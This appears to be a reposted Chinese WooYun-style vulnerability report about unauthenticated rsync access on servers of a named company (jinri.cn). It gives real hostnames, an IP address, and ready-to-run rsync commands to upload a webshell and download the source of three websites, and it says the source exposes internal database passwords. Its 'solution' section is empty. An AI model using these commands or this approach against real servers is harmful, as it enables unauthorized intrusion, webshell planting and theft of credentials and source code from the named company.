今日天下通未授权访问导致源码泄露及任意文件上传
今日天下通未授权访问 这么多信息 求高rank啊
详情请见 WooYun: 今日天下通某服务器rsync未授权访问
m243.jinri.cn —> 121.52.212.243
可知已修复 然并卵啊
同网段下 244 rsync baom.jinri.cn::
底下打箭头的三个文件是可以下载的 即是
seller.jinri.cn
buyer.jinri.cn
portal.jinri.cn
执行 rsync -av r00ts111.aspx baom.jinri.cn::seller.jinri.cn/test/
可上传webshell 任意上传
rsync baom.jinri.cn::seller.jinri.cn/test/
网站可以上传 已测试 但不清楚为什么访问不了 对rysnc不熟 但的的确确是源码
rsync -avz baom.jinri.cn::portal.jinri.cn/portal.jinri.cn/ /portal1
3个网站源码都可以下载 已测试 下载下portal.jinri.cn 网站 随便找下敏感信息
redis数据库
内网sqlserver sa密码
内网sqlserver sa密码
解决方法:
rank 绝对不是2个吧 排版了这么久
—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/esecurity/100403.html